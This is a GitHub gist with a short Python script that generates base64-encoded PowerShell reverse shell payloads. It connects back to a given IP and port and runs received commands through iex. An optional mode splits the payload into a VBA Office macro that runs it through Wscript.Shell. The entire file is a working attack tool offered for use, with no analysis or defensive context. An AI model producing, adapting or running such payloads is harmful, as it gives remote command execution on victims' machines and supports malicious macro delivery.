Created
March 12, 2024 15:43
-
-
Save jakobfriedl/7e1aca7228671271f1a4f86c9fd7a53e to your computer and use it in GitHub Desktop.
Generate PowerShell reverse shell payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Author: Jakob Friedl | |
# Description: Generate powershell reverse shell payloads | |
import sys | |
import base64 | |
import argparse | |
parser = argparse.ArgumentParser(description="Powershell reverse shell generator") | |
parser.add_argument('ip') | |
parser.add_argument('port') | |
parser.add_argument('-m', '--macro', action='store_true', help='Generate payload in VBA format for Microsoft Office macro') | |
args = parser.parse_args() | |
payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | |
payload = payload % (args.ip, int(args.port)) | |
cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() | |
if args.macro: | |
# Line length | |
n = 50 | |
print("Dim Str as String") | |
for i in range(0, len(cmdline), n): | |
print("Str = Str + " + '"' + cmdline[i:i+n] + '"') | |
print('CreateObject("Wscript.Shell").Run Str') | |
else: | |
print(cmdline) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment